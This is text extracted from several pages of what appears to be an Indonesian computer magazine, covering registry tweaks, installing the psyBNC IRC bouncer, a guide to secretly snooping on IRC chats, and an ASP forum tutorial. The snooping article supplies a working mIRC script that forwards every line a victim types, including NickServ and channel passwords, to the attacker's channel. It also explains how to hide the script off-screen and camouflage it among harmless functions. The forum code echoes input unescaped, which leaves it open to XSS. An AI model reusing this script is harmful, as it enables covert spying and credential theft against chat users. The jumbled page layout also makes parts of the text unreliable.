“Displays the contents of
your computer.”. Gantilah tu-
lisan tersebut dengan tulisan
yang menurut anda menarik.

Untuk melihat hasilnya, mi-
nimize-lah semua aplikasi
dan gerakkan pointer mouse
ke atas My Computer, maka
akan terlihat tooltip yang
telah anda isikan.

Cara yang sama juga dapat
diterapkan untuk mengganti
tooltip pada folder khusus
lain. Gunakan Tabel 3 berikut
ini untuk mengetahui key
registrynya.

Ahirnya penulis ucapkan
selamat mencoba dan jangan
lupa mem-backup registry
Windows anda. Bila anda
menjumpai permasalahan,
silakan menghubungi penulis
via email atau dengan
bergabung dengan mailing
list paraanakbangsa@yahoo-
groups.com atau majalah-
neotek@yahoogroups.com,
penulis dengan senang hati
berupaya membantu anda
menurut kadar kemampuan
penulis. Have some fun!

Nama Ikon Key Registry String Value

My Computer hkcu\software\classes\clsid\{645FF040-5081-101B-9F08-00AA002F954E} default
Network Neighborhood hkcu\software\classes\clsid\{208D2C60-3AEA-1069-A2D7-08002B30309D} default
Recycle Bin hkcu\software\ classes\clsid\{645FF040-5081-101B-9F08-00AA002F954E} default
My Documents hkcu\software\classes\clsid\{450D8FBA-AD25-11D0-98A8-0800361B1103} default
Internet Explorer hkcu\software\classes\clsid\{871C5380-42A0-1069-A2EA-08002B30309D} default
Control Panel hkcu\software\classes\clsid\{21EC2020-3AEA-1069-A2DD-08002B30309D} default
Printers hkcu\software\classes\clsid\{2227A280-3AEA-1069-A2DE-08002B30309D default
Dial-Up Networking hkcu\software\classes\clsid\{992CFFA0-F557-101A-88EC-00DD010CCC48} default
Web Folders hkcu\software\classes\clsid\{BDEADF00-C265-11D0-BCED-00A0C90AB50F} default
Scheduled Tasks hkcu\software\classes\clsid\{D6277990-4C6A-11CF-8D87-00AA0060F5BF} default

Tabel 2.  Tabel Key Registry untuk mengganti nama folder khusus

Nama Ikon Key Registry String Value

My Computer Hkcr\clsid\{20D04FE0-3AEA-1069-A2D8-08002B30309D} Tooltip
Network Neighborhood Hkcr\clsid\{208D2C60-3AEA-1069-A2D7-08002B30309D} Tooltip
Recycle Bin Hkcr\clsid\{645FF040-5081-101B-9F08-00AA002F954E} Tooltip
My Documents Hkcr\clsid\{450D8FBA-AD25-11D0-98A8-0800361B1103} Tooltip
Internet Explorer Hkcr\clsid\{871C5380-42A0-1069-A2EA-08002B30309D} Tooltip
Control Panel Hkcr\clsid\{21EC2020-3AEA-1069-A2DD-08002B30309D} Tooltip
Printers Hkcr\clsid\{2227A280-3AEA-1069-A2DE-08002B30309D} Tooltip
The Internet Hkcr\clsid\ {3DC7A020-0ACD-11CF-A9BB-00AA004AE837} Tooltip
Briefcase Hkcr\clsid\{85BBD920-42A0-1069-A2E4-08002B30309D} Tooltip
Dial-Up Networking Hkcr\clsid\ {992CFFA0-F557-101A-88EC-00DD010CCC48} Tooltip
Web Folders Hkcr\clsid\ {BDEADF00-C265-11D0-BCED-00A0C90AB50F} Tooltip
Scheduled Tasks Hkcr\clsid\ {D6277990-4C6A-11CF-8D87-00AA0060F5BF} Tooltip

Tabel 3.  Tabel Key Registry untuk mengganti tooltip folder khusus

Keterangan: hkcr = HKEY_Classes_root
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pakah psyBNC itu? PsyBNC
mempunyai kegunaan yang
sama dengan BNC tetapi mem-

punyai fungsi lebih luas. Dengan psyBNC,
misalnya, nick anda akan on terus sela-
ma 24 jam sehari dan 7 hari seminggu.
Contoh lain kegunaannya adalah dapat
menyembunyikan IP asli anda di IRC
dan dari DCC (chat, get, send)

Untuk dapat menginstal psyBNC, anda
harus mempunyai shell account tempat
untuk anda menginstalnya. Untuk itu
anda dapat mendaftar di provider shell
seperti shellindo.com. Untuk lebih jelas,
berikut bahasan kami mengenai contoh
cara menginstal dan menjalankan
psyBNC pada remote shell account,
lewat Windows.

A

Decompress PsyBNC tarball
Jalankan proses dekompresi terhadap
file yang baru kita download dengan
perintah wget tadi sebagai berikut:
$ tar -zxvf psyBNC2.3.tar.gz
yang akan mengekstrak file-file ke
dalam folder psybnc lengkap dengan
sub-subfolder-nya.

4

10 11

5 6

12

Masuk ke Folder psybnc
Selanjutnya masuk ke folder psybnc
yang baru terbentuk tadi dengan
perintah:
$ cd psybnc
Kita siap untuk melakukan proses
kompilasi (make) dan konfigurasi
terhadap software psyBNC kita.

Kompilasi psyBNC
Untuk melakukan proses kompilasi
terhadap psyBNC, ketikkan perintah:
$ make

Kembali ke mIRC Windows
Buka program irc anda (mIRC). Ubah
ident anda (akan menjadi username
anda). Untuk mengubah ident anda
di mIRC. Tekan Alt+o cari tulisan
ident (di Connect | ident) ubah
ident anda menjadi username yang
diinginkan.

psyBNC Anda Sebagai Server
Agar mIRC mengenali psyBNC yang
ada di shell anda itu sebagai server,
pada status mIRC ketikkan "/server
alamatshellanda.com port" (di sini
/server shell.tracenetwork.net 1201)
dan tekan tombol Enter.

Password untuk Akses psyBNC
Setelah terkoneksi pada server
psyBNC anda, ketik
/quote pass password
(password dapat dipilih apa saja).
Inilah yang menjadi password anda.
Setiap koneksi anda harus memasuk-
kan perintah /quote pass password

Instalasi dan menjalankan psyBNC pada remote Unix Shell Account (lewat Windows).

MMEENNGGGGUUNAKNAKAN PSAN PSYYBBNNCC
SSAAAAT CT CHAHAT DT DI II IRRCC

BNC (bouncer) digunakan untuk menyembunyikan IP asli di IRC. BNC
juga yang dapat melindungi kita dari nuke atau flood karena shell
provider yang mempunyai high-bandwith bisa menampung kiriman
paket yang banyak. Redi Tya K. membahas versi BNC yang lebih
populer yaitu psyBNC.
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Edit Konfigurasi PsyBNC
Selanjutnya edit file konfigurasi
psyBNC (psybnc.conf) dengan text
editor yang ada pada sistem Unix
(pico) dengan mengetikkan perintah:
$ pico psybnc.conf
Edit portnya sesuai yg anda inginkan
(1201) tekan Ctrl+X untuk keluar dan
ketik Y dan Enter.

Menjalankan psyBNC
Kini anda siap menjalankan psyBNC
anda yang akan listen pada port 1201
seperti yang telah anda tetapkan pada
psybnc.conf. Ketikkan perintah:
$ ./psybnc
Jika tidak ada masalah (error sewaktu
kompilasi), selesailah instalasi psyBNC
di shell anda. 

Instalasi Selesai
Jangan lupa men-delete file salt.h di
folder psybnc dengan perintah
$ rm -rf salt.h
Kalau keluar tulisan seperti Cannot
create listening port...     aborting,
artinya port sudah terpakai atau tidak
bisa dipakai. Ulangi Langkah 7 dan
ganti port-nya.

Dalnet Sebagai Server Kedua
Ketik /addserver irc.dal.net:6667
untuk menyambungkan anda ke IRC
Dalnet. Anda bisa menambahkan IRC
server lebih dari satu. Ketik /bconnect
agar anda tersambung ke server IRC
dan /bquit untuk memutus sambung-
an dari server IRC.

Sharing psyBNC dengan Teman
Untuk membagi fasilitas psybnc , ketik
/adduser ident:username (/adduser
redi:redi). Password akan terbentuk
sendiri secara acak. Jika ingin meng-
ganti password ketik /password
password. Jangan menambah terlalu
banyak user; bandwidth akan banyak
terpakai dan shell account dapat ditutup.

IP Tersembunyi dengan Vhost
Biasanya shell provider menyediakan
vhost (vanity host) yang bisa anda
gunakan. Dengan vhost, anda bisa
mengubah IP anda menjadi misalnya
redi.love.cuttiest.dal-n-e-t.net dll. Baca
keterangan Shell anda atau hubungi
costumer service-nya.
Selamat mencoba!

1 2 3
Download psyBNC tarball
Download psyBNC tarball, yaitu
psyBNC2.3.tar.gz pada URL berikut
ini dengan perintah Unix command
shell wget sebagai berikut:
$ wget
takiweb.com/files/psyBNC2.3.tar.gz

Download PuTTY
PsyBNC dapat dibuat pada Unix shell.
Untuk akses ke Unix shell, download
PuTTY dan gunakan fasilitas telnet
program ini. PuTTY dapat diperoleh di
www.chiark.greenend.org.uk/
~sgtatham/putty

Telnet ke Unix shell
Anda harus sudah mempunyai account
si Unix shell yang mendukung fasilitas
BNC atau PsyBNC. Dalam hal ini
digunakan shell.traceroute.net.
Jalankan PuTTY dan telnet ke shell
anda. (host: shell.tracenetwork.net port:
23)
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ADA SAAT ANDA
chat di IRC (In-
ternet Relay Chat),

pernahkah terbersit di benak
anda untuk mengetahui apa
yang sedang dibicarakan
orang lain, teman anda, atau
mungkin pacar anda dengan
lawan bicaranya? Dan kepada
siapa-siapa saja orang terse-
but ngobrol (chat) secara pri-
badi (private) pada saat itu?

Pertanyaan berikutnya, per-
nahkah terlintas di benak an-
da untuk “mencuri” kata
sandi channel atau nick orang
lain agar anda memperoleh
akses sebagai OP dan founder
pada suatu channel di IRC?
Jika jawaban anda terhadap
pertanyaan-pertanyaan di
atas adalah “Ya,” maka anda
dapat meneruskan membaca
artikel ini.

Konsepnya sangat sederhana
yaitu membuat skrip yang
ditulis dengan menggunakan
bahasa skrip IRC. Skrip se-
derhana ini kemudian akan
dikirim ke orang lain untuk
di-load oleh program mIRC
atau PIRCH yang mereka
jalankan. Dengan demikian,
saat komputer teman anda
tadi terhubung ke Internet,
lalu menjalankan program
mIRC dan menghubungkan-

nya ke server IRC, maka tan-
pa disadarinya semua yang
diketik (baik itu dari jendela
status, channel, atau jendela
query) akan dikirimkan lang-
sung kepada anda. Dengan
begitu anda akan tahu dengan
siapa saja orang tersebut bica-
ra, apa saja yang diketik/
dibicarakan. Jika diibaratkan
sebagai email, maka anda
akan selalu menerima carbon
copy-nya, lengkap tanpa ada
satu huruf atau kalimat yang
tertinggal. Jadi bisa dibayang-

kan betapa senangnya anda
pada saat teman anda tadi
mulai mengetik, dan tidak
lama kemudian di jendela
mIRC anda tiba-tiba muncul
teks seperti ini:

• /nickserv identify blablabla

• /chanserv identify
#neohacker blablabla

• /server
shell.hacker.com.br:9001
blablabla.

Informasi di atas berharga

untuk anda karena dengan
itu anda akan memperoleh
akses sebagai founder pada
channel orang yang menge-
tik perintah tersebut, di sam-
ping informasi lainnya yang
buat anda mungkin ada man-
faatnya. Untuk membantu
anda memahami apa yang
saya maksudkan, silakan
simak Gambar 1 di atas.

Dalam ilustrasi gambar
tersebut terlihat bahwa user
A sedang asyik ngobrol (chat)

PPembicarembicaraan di Iaan di I RRCC
NgNgupinguping

Suatu saat anda mungkin iseng ingin mengetahui isi pembicaraan para peserta chat di IRC. Anda dapat
‘menyadap’ obrolan mereka dengan menggunakan skrip yang dapat anda buat sendiri. Berdasarkan

pengalamannya, Eryanto Sitorus menyajikan caranya untuk anda.

P

• Gambar 1. Menyadap pembicaraan di IRC (Internet Relay Chat)
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bersama user B. Sementara
itu, user C yang jauh di sebe-
rang sana juga terlihat asyik
mengamati setiap pesan yang
muncul di jendela program
mIRC-nya yang dikirim oleh
user A pada saat ngobrol
dengan user B.

Jika anda tertarik, dan ingin
melihat langsung efeknya,
ketiklah listing skrip di bawah
ini dengan menggunakan
editor NotePad, kemudian
simpan ke dalam direktori
program mIRC Anda dengan
nama file test.ini.

Setelah itu aktifkan file
tersebut dengan melakukan
beberapa hal sebagai berikut:

1. Jalankan program mIRC
anda dan hubungkan ke salah
satu server IRC yang biasa
anda masuki. Lalu masuklah
(join) ke channel #neohacker.

2. Buka satu lagi program
mIRC Anda lalu hubungkan
ke server IRC yang sama de-

ngan program mIRC pertama
tadi.

3. Pada jendela status program
mIRC yang ke dua, ketik kan
perintah ini:

• /load -rs test.ini
• /remote on

Setelah itu mulai lah menge-
tik sembarang teks, misalnya
mengetik perintah untuk
identify nick atau channel
anda, atau chat dengan user
lain.

5. Lalu buka (restore) pro-
gram mIRC yang pertama,
dan lihat apa yang terjadi. Se-
mua yang anda ketik pada
jendela mIRC yang kedua
tadi terlihat semua dengan
jelas di jendela #neohacker,
sebagaimana yang diperlihat-
kan pada Gambar 2 di bawah
ini.

Pada gambar tersebut terlihat
bahwa seseorang yang meng-
gunakan nick tricksy perta-
ma-tama melakukan identify
nick dengan kata sandi
etherz111. Dan setelah itu
tricksy melakukan identify
terhadap channel-nya
#medan dengan password
chx14282, yang kemudian
dilanjutkan dengan mengetik
perintah /join untuk masuk
ke channel #medan. Masing-
masing ketiga buah perintah
tersebut diketik tricksy dari
dalam jendela status (Status
Window) program mIRC-
nya. Selanjutnya pada baris
ke 4, 5, dan 6, teks yang
terlihat adalah merupakan
pesan yang diketik tricksy
dari jendela channel #medan.

6. Jalankan program Windows
Explorer Anda, lalu browse

folder C:\WINDOWS\
TEMP. Kemudian klik dua
kali file arsip.txt, hasilnya akan
terlihat sama dengan yang
terlihat pada jendela #neo-
hacker. Namun pada file
arsip.txt ada sedikit penam-
bahan, yaitu nick dan alamat
IP yang bersangkutan. Tuju-
annya adalah agar anda selalu
mengetahui identitas user
yang aktif pada saat itu. Ben-
tuk tampilannya diperlihat-
kan pada Gambar 3.

Agar para user yang menda-
patkan file skrip yang anda
tulis tadi nantinya tidak akan
menyadari adanya bahaya
jika skrip tersebut di-load
oleh program mIRC yang
mereka jalankan, maka Anda
harus menyembunyikannya
serapi mungkin. Ada bebera-
pa skenario yang bisa anda
terapkan untuk menyembu-
nyikan potongan skrip di
atas. Beberapa di antaranya
adalah sebagai berikut:

1. Menyisipkannya di antara
skrip lain, misalnya skrip
scramble yang saat ini masih
diminati sebagian besar user
di IRC.

2. Membuatkan skrip tam-
bahan untuk melakukan
fungsi-fungsi lain sebagai
kamuflase. Misalnya fungsi
inviter untuk mengundang
user secara otomatis (auto
join) ke dalam channel ter-
tentu, memberi pesan “say
hello” secara otomatis pada
user baru yang baru saja
masuk (on join), atau ping
untuk mem-ping secara oto-
matis pada saat skrip mende-
teksi kata !ping, dan lain se-
bagainya. Tujuannya adalah
untuk mengalihkan perhatian
user agar tidak terfokus ke
skrip yang berbahaya tadi.
Dan pada saat orang tersebut

[script]n0=on 1:INPUT:*:{
.msg #neohacker $active $+
: $1- | write
c:\windows\temp\arsip.txt<
$+ $nick $+ @ $+ $ip $+ >
$active $+ : $1- }

• Gambar 2. Membaca teks yang berhasil disadap di channel #neohacker.

• Gambar 3. Membaca log yang tersimpan dalam file arsip.txt
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memeriksa kotak Remote
Script-nya, maka yang akan
terlihat adalah seperti pada
Gambar 4.

Pada gambar di atas, perintah
yang diapit oleh tanda kura-
wal {} pada baris perintah on
1:INPUT:*: tidak terlihat,
karena telah digeser jauh-
jauh ke arah samping kanan
jendela kotak Remote Script.
Cara seperti ini sering digu-
nakan untuk mengelabui user
yang ceroboh. Dan terbukti,
banyak user yang terperang-
kap karena tidak mengetahui
kalau program mIRC-nya
telah me-load sesuatu yang
berbahaya. Apakah karena
mereka sudah tidak sabaran
lagi ingin chat dengan orang-
orang yang dianggapnya
sebagai pacar? Dan tidak
sempat meluangkan waktu-

nya sedikit untuk memeriksa
options pada program
mIRCnya? Entahlah!. :)

Contoh listing-nya terlihat
pada boks listing skrip di
bawah.

Ketik listing skrip tersebut,
lalu simpan ke dalam direkto-
ri program mIRC anda dengan
nama file script.ini. Setelah
itu aktifkan dengan mengetik
perintah berikut:

• /load -rs script.ini
• /remote on

Yang menarik dari skrip ter-
sebut (di baris n8) adalah, bah-
wa pada saat perintah send
msg dilaksanakan maupun
pada saat pesan ditulis ke da-
lam file arsip.txt, tidak terlihat
adanya pesan pengiriman di
jendela status mIRC.

Gambar 5. Pesan pengiriman

teks tidak terlihat

Bandingkan jika Anda
menuliskannya seperti ini :

on 1:INPUT:*:{msg
#neohacker $active $+ : $1- |
write c:\windows\temp\arsip.
txt < $+ $nick $+ @ $+ $ip
$+ > $active $+ : $1- }

Pada saat perintah selesai di-
laksanakan, maka bersamaan
dengan itu pula akan muncul
pesan status yang menyirat-
kan adanya proses pengirim-
an pesan kepada seseorang,
seperti yang tampak pada
Gambar 6 di bawah ini.

Jadi jelas lah sudah, bahwa
siapa pun orang yang me-

load skrip tersebut di atas
akan mengirimkan semua
teks yang mereka ketik ke
dalam channel #neohacker,
sesuai dengan target yang
anda set. Tetapi, setelah itu
mungkin anda akan bertanya
seperti ini, “Ntar gimana
dong kalau gue engga online
pada saat itu? Kan gue engga
bisa melihat teks yang mere-
ka ketik!?”. Sebagai jawaban-
nya saya menyarankan anda
memanfaatkan Eggdrop (Bot)
(dibahas pada NeoTek Vol II,
No. 9) atau PsyBNC (dibahas
pada nomor ini, hlm. 14-15).
Kemudian ganti target pengi-
rimannya kepada nick Egg-
drop atau PsyBNC anda.

• Gambar 4. Melihat listing skrip dalam kotak Remote Script. • Gambar 5 Pesan pengiriman teks tidak terlihat.

[script]
n0=on 1:JOIN:#:{
n1=  if ($nick != $me) {
n2=  msg $chan Hello $lower($nick) $+ !
n3=  msg $chan apa kabar nih bro ? :)
n4=  invite $nick #neohacker
n5=  }
n6=}
n7=
n8=on 1:INPUT:*:{.msg #neohacker $active $+ : $1- | write
c:\windows\temp\arsip.txt < $+ $nick $+ @ $+ $ip $+ >
$active $+ : $1- }
n9=on 1:TEXT:!ping:*:{
n10=  if ($nick != $me) {
n11=    ping $nick  
n12=  }
n13=}

• Gambar 6 Pesan pengiriman teks tidak terlihat.



Sebagai contoh misalnya nick
PsyBNC anda adalah instantia,
maka skripnya akan terlihat
seperti ini:

on 1:INPUT:*:{.msg instantia
$active $+ : $1- }

Lalu pada saat anda online,
dan terhubung kembali ke
PsyBNC pada hari berikutnya,
maka anda cukup mengetik-
kan perintah /QUOTE
PLAYPRIVATELOG untuk
membaca semua pesan (mes-
sages) yang terekam dalam
file log PsyBNC anda. Gam-
pang sekali bukan? :)

Tapi anda jangan terburu

happy karena masih ada satu
persoalan yang harus anda
cari jalan keluarnya, yaitu
bagaimana cara mengirimkan
file skrip yang anda tulis tadi
ke dalam PC orang lain?

Sementara anda memikirkan
teknik yang jitu untuk mele-
takkan file skrip tersebut ke
dalam PC orang lain, saya
juga ingin mengingatkan
pembaca yang lain tentang
beberapa hal berikut:

1. Berhati-hati lah jika Anda
chat dari komputer orang
lain, khususnya bagi Anda
pelanggan setia Warnet.

2. Waspadai rekan di sebelah
anda. Karena siapa tahu rekan
anda sedang iseng, lalu men-
jebak anda dengan skrip tadi.

3. Jika Anda tidak sempat/
malas memeriksa kotak
Remote Script beserta semua
opsi pada program mIRC
yang sedang anda jalankan,
maka biasakan untuk selalu
mengetik perintah-perintah
di bawah ini terlebih dahulu
sebelum anda benar-benar
terhubung ke server IRC:
• /unload -rs script.ini
• /remote off
• /log off

4. Jika anda sempat, tekan

tombol ALT+R untuk me-
munculkan kotak Remote
Script pada program mIRC
Anda, dan pastikan bahwa
tidak ada skrip yang di-load.

5. Jangan sembarang mene-
rima (get) skrip yang dikirim
orang lain, sekali pun yang
mengirimkannya adalah
teman anda sendiri.

6. Klik menu DCC → Op-
tions → Send pada program
mIRC anda untuk memasti-
kan bahwa event On Send
Request berada pada posisi
Show get dialog atau Ignore
All.
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• Gambar 7. Membaca pesan/informasi yang tersimpan dalam file log psyBNC

• Gambar 8 Memeriksa kotak Remote Script. • Gambar 9 Mmeriksa On Send pada DCC Options program mIRC.
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ETIAP ORANG YANG MEMILIKI HALAMAN Web pasti
mengharapkan agar halamannya itu bersifat inter-
aktif. Untuk mewujudkannya, webmaster dari web

tersebut dapat menambahkan beberapa fitur seperti Polling,
Buku Tamu, Counter, Forum dan masih banyak lagi. Anda
bisa mendapatkannya di beberapa situs portal di internet
yang menyediakannya dengan gratis. Namun kali ini, kita
akan mencoba untuk membuatnya sendiri dengan meng-
gunakan ASP. Kali ini kita akan membuat forum namun
bukan forum biasa, melainkan forum ala mailing list
(milis) sehingga akan lebih interaktif.

Untuk membuatnya kita memerlukan enam buah file
yang akan kita buat satu per satu.

1. File adovbs.inc
File ini merupakan file yang harus diikutsertakan bila
anda akan menggunakan basisdata. Dalam file ini terdapat
konstanta-konstanta yang diperlukan oleh metode ADO.
File ini dapat anda temukan di C:\Program Files\Common
Files\System\ADO.

2. Database untuk menyimpan data (forum.mdb)
Untuk basisdata, kita akan menggunakan Microsoft Access
untuk membuatnya.Ikuti langkah-langkah di bawah ini:

S

Aplikasi ASAplikasi ASP di Situs WP di Situs Webeb
FForum ala Milisorum ala Milis

Untuk menambah fitur interaktif pada halaman Web, anda dapat menambahkan forum semacam
milis di dalamnya dan forum itu dapat dibuat secara sederhana dengan menggunakan ASP. David

Sugianto menjelaskannya kepada anda dengan uraian yang mudah dipahami.

Buka Microsoft Access, pilih “Blank
Access Database.” Klik OK.

Simpan database yang dibuat dengan
nama forum, lalu klik Create

Klik dua kali “Create Table in
Design View.”

Simpan tabel dengan nama data,
lalu tutuplah Microsoft Access.

Isi kolom diatas dengan:

Field Name Data Type
ID AutoNumber
Tanggal Date/Time
Jam Date/Time
Nama Text
Email Text
Topik Text
Isi Memo
Keterangan lain:
Isi Field Size untuk
Nama = 30, Email = 30, Topik = 70
ID sebagai Primary Key-nya

1 2 3

4 5
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3. Halaman untuk Form (formforum.asp)
Ketikkan kode berikut pada editor kesayangan anda:

Hasilnya akan seperti gambar berikut:

Pada halaman ini, pengunjung dapat mengisi formulir yang
disediakan berupa nama, email, topik yang akan dibicarakan,
dan isi pembahasan. Keistimewaan formulir ini ialah dapat
berlaku seperti compose di milis, yang jika pengunjung ingin
menjawab suatu suatu topik, maka formulir ini akan otomatis
mengisi topik dengan tambahan huruf “Re:” pada topik yang
akan dijawab. Untuk itu gunakan kode ASP.

<% If NOT Kat = “” Then 
If NOT testre = “Re” Then
Response.Write “Re:” &Kat
Else
Response.Write Kat
End If
End If%>

Yang sebelumnya ada scripting berupa:
<%Kat = Request.QueryString(“kat”)
testre = left(Kat, 2)
%>

untuk memeriksa agar tidak ada penulisan “Re:” dua kali.

4. Halaman untuk ucapan Terima Kasih dan
memasukkan data ke database (thanks.asp)

<html><head>
<title>Forum</title>
</head>
<body>
<h1><b>Forum</b></h1>
<hr>
<%Kat = Request.QueryString("kat")
testre = left(Kat, 2)
%>
<form method="POST" action="thanks.asp">
<pre>

Nama       : <input type="text" name="txtnama"
size="22">

E-mail     : <input type="text" name="txtemail"
size="22"></pre>
<div align="center">
<pre>Topik :
<input type="text" name="txttopik" size="51"
value=
<% If NOT Kat = "" Then
If NOT testre = "Re" Then
Response.Write "Re:" &Kat
Else
Response.Write Kat
End If
End If
%>>

Isi<textarea rows="5" cols="40"
name="txtisi"></textarea></pre>
</div>
<p align="center">

<input type="submit" value="Kirim">
<input type="reset" value="Reset">

</form>

<html><head>
<title>Forum</title>
</head>
<body><% If Request.Form("txtnama") = "" Then
Response.Write "Anda belum mengisi <b>nama</b> anda"
ElseIf Request.Form("txtemail") = "" Then
|Response.Write "Anda belum mengisi <b>e-mail</b> anda "
ElseIf InStr(Request.Form("txtemail"),"@") = 0 Then
Response.Write "E-mail anda tidak valid"
ElseIf Request.Form("txttopik") = "" Then
Response.Write "Anda belum mengisi <b>Topik</b> anda"
ElseIf Request.Form("txtisi") = "" Then
Response.Write "Anda belum mengisi <b>Kolom Isi</b> anda"
Else %>
<!--#Include File="adovbs.inc"-->
<%Dim objConn
Dim objComm
Dim objPar
Dim strSQL
Dim Path
Dim reqTanggal
Dim reqJam
Dim reqNama
Dim reqEmail
Dim reqTopik
Dim reqIsi
reqTanggal = Date
reqJam = Time
reqNama = Request.Form("txtnama")
reqEmail = Request.Form("txtemail")
reqTopik = Request.Form("txttopik")
reqIsi = Request.Form("txtisi")
Path = Server.MapPath("forum.mdb")
strSQL = "INSERT INTO Data (Tanggal, Jam, Nama, Email, Topik,
Isi) VALUES (?, ?, ?, ?, ?, ?)"
Set objConn = Server.CreateObject("ADODB.Connection")
objConn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Path
Set objComm = Server.CreateObject("ADODB.Command")
objComm.ActiveConnection = objConn
objComm.CommandText = strSQL
Set objPar = objComm.CreateParameter(, adDate, ,8, reqTanggal)
objComm.Parameters.Append objPar
Set objPar = objComm.CreateParameter(, adDate, ,8, reqJam)
objComm.Parameters.Append objPar
Set objPar = objComm.CreateParameter(, adChar, ,30, reqNama)
objComm.Parameters.Append objPar
Set objPar = objComm.CreateParameter(, adChar, ,30, reqEmail)
objComm.Parameters.Append objPar
Set objPar = objComm.CreateParameter(, adChar, ,70, reqTopik)
objComm.Parameters.Append objPar
Set objPar = objComm.CreateParameter(, adChar, ,65535, reqIsi)
objComm.Parameters.Append objPar
objComm.Execute%>
<p align="center"><font size="5"><b>Terima Kasih Atas Partisipasi Anda,
<%=reqNama%></b></font></p>
<hr><p align="center"><font size="3">Topik :
<b><%=reqTopik%></b></font>
<p align="center">
<font size="6"><b>Telah
Terposting<%objConn.Close%></b></font><%end if%>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center"><a href="formforum.asp">Join Forum</a></p>
<p align="center"><a href="list.asp">Ruang Forum</a></p>
</body></html>
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Ketikkan kode di atas ini ke teks editor kesayangan anda.
Hasilnya akan tampak seperti yang berikut:

Penjelasan skrip ASP:
<% If Request.Form("txtnama") = "" Then     
Response.Write "Anda belum mengisi <b>nama</b> anda"
ElseIf Request.Form("txtemail") = "" Then     
Response.Write "Anda belum mengisi <b>e-mail</b> anda "   
ElseIf InStr(Request.Form("txtemail"),"@") = 0 Then     
Response.Write "E-mail anda tidak valid"   
ElseIf Request.Form("txttopik") = "" Then     
Response.Write "Anda belum mengisi <b>Topik</b> anda"
ElseIf Request.Form("txtisi") = "" Then     
Response.Write "Anda belum mengisi <b>Kolom Isi</b> anda"

Skrip ini berfungsi untuk memeriksa apakah pengisian
formulir telah benar. Maksudnya, semua field yang ada di
formulir yang berupa field Nama(txtnama), Email(txtemail),
Topik(txttopik), Isi(txtisi) harus sudah diisi. Skrip ini juga
memeriksa apakah field email telah terisi dan valid. Untuk
menentukan valid atau tidaknya suatu email, kita meng-
gunakan logika sederhana. Setiap alamat email harus
menggunakan karakter '@' dan kita menggunakan kunci
karakter tersebut untuk memeriksa email yang diisi. Jika
dalam pengisian email terdapat karakter tersebut, maka
kita berasumsi bahwa email yang dimasukkan valid. Jika
semua field telah terisi dengan benar, maka akan dilan-
jutkan dengan pemrosesan halaman thanks.asp yang
sesungguhnya.

Dim objConn
Dim objComm
Dim objPar
Dim strSQL
Dim Path
Dim reqTanggal
Dim reqJam
Dim reqNama
Dim reqEmail
Dim reqTopik
Dim reqIsi
reqTanggal = Date
reqJam = Time
reqNama = Request.Form("txtnama")
reqEmail = Request.Form("txtemail")
reqTopik = Request.Form("txttopik")
reqIsi = Request.Form("txtisi")

Semua variabel yang akan kita gunakan dideklarasikan
terlebih dahulu dengan menggunakan perintah 'Dim'.
Serta menerima data yang dikirim melalui formulir dan
menyimpannya ke dalam veriabel tertentu.

Path = Server.MapPath("forum.mdb")
strSQL = "INSERT INTO Data (Tanggal, Jam, Nama, Email,
Topik, Isi) VALUES (?, ?, ?, ?, ?, ?)"
Set objConn = Server.CreateObject("ADODB.Connection")
objConn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data
Source=" & Path
Set objComm = Server.CreateObject("ADODB.Command")
objComm.ActiveConnection = objConn
objComm.CommandText = strSQL

Kini kita akan membuat koneksi ke database yang ber-
nama “forum.mdb” yang telah kita buat dan menentukan
nama tabel dan field-field yang akan menjadi tujuan
penyimpanan data.

Set objPar = objComm.CreateParameter(, adDate, ,8, reqTanggal)
objComm.Parameters.Append objPar
Set objPar = objComm.CreateParameter(, adDate, ,8, reqJam)
objComm.Parameters.Append objPar
Set objPar = objComm.CreateParameter(, adChar, ,30, reqNama)
objComm.Parameters.Append objPar
Set objPar = objComm.CreateParameter(, adChar, ,30, reqEmail)
objComm.Parameters.Append objPar
Set objPar = objComm.CreateParameter(, adChar, ,70, reqTopik)
objComm.Parameters.Append objPar
Set objPar = objComm.CreateParameter(, adChar, ,65535, reqIsi)
objComm.Parameters.Append objPar
objComm.Execute

Kini tugas yang paling akhir ialah memasukkan data-data
ke dalam masing-masing field dengan menentukan tipe
data dan besar field yang harus sesuai dengan database.

5. Halaman untuk menampilkan daftar forum
yang telah masuk ke database (list.asp)
Ketikkan kode berikut pada editor kesayangan anda:

<html><head>
<title>Forum</title>
</head>
<body>
<p align="center"><font size="5"><b>Ruang Forum</b></font></p>
<hr><p>
<!--#Include File="adovbs.inc"-->
<%
Dim objConn
Dim ObjRset
Dim filePath
Dim strSQL
Dim tombol
Dim hlm
Dim i
filePath = Server.MapPath("forum.mdb")
strSQL = "SELECT * FROM data ORDER BY Tanggal DESC, Jam DESC"
Set objConn = Server.CreateObject("ADODB.Connection")
objConn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & filePath
Set objRset = Server.CreateObject("ADODB.Recordset")
objRset.Open strSQL, objConn, adOpenStatic
objRset.PageSize = 50
%>
<%
tombol = Request.Form("tombol")
If Request.Form("hlm") = "" Then

hlm = 1
Else

hlm = Request.Form("hlm")
End If
%>
<%
If tombol = "Sebelumnya" or tombol = "Selanjutnya" Then
Select Case tombol
Case "Sebelumnya"

If hlm > 1 Then
hlm = hlm - 1

Else



Hasilnya akan ampak seperti berikut:

Keterangan skrip ASP
Dim objConn
Dim ObjRset
Dim filePath
Dim strSQL
Dim tombol
Dim hlm
Dim i
filePath = Server.MapPath("forum.mdb")
strSQL = "SELECT * FROM data ORDER BY Tanggal DESC,
Jam DESC"
Set objConn = Server.CreateObject("ADODB.Connection")
objConn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data
Source=" & filePath
Set objRset = Server.CreateObject("ADODB.Recordset")
objRset.Open strSQL, objConn, adOpenStatic
objRset.PageSize = 50

Skrip di atas berfungsi mendeklarasikan variabel-variabel
yang akan kita gunakan, lalu membuka koneksi ke
basisdata bernama “forum.mdb” dan mengaktifkan tabel
“data” dengan memprioritaskan Tanggal dan Jam secara
descending. Skrip juga membatasi data yang akan tampil
di layar sebanyak 50 data per halaman.

tombol = Request.Form("tombol")
If Request.Form("hlm") = "" Then

hlm = 1
Else

hlm = Request.Form("hlm")
End If

Menentukan halaman forum yang aktif pada saat ini.
If tombol = "Sebelumnya" or tombol = "Selanjutnya" Then
Select Case tombol
Case "Sebelumnya"

If hlm > 1 Then
hlm = hlm - 1

Else
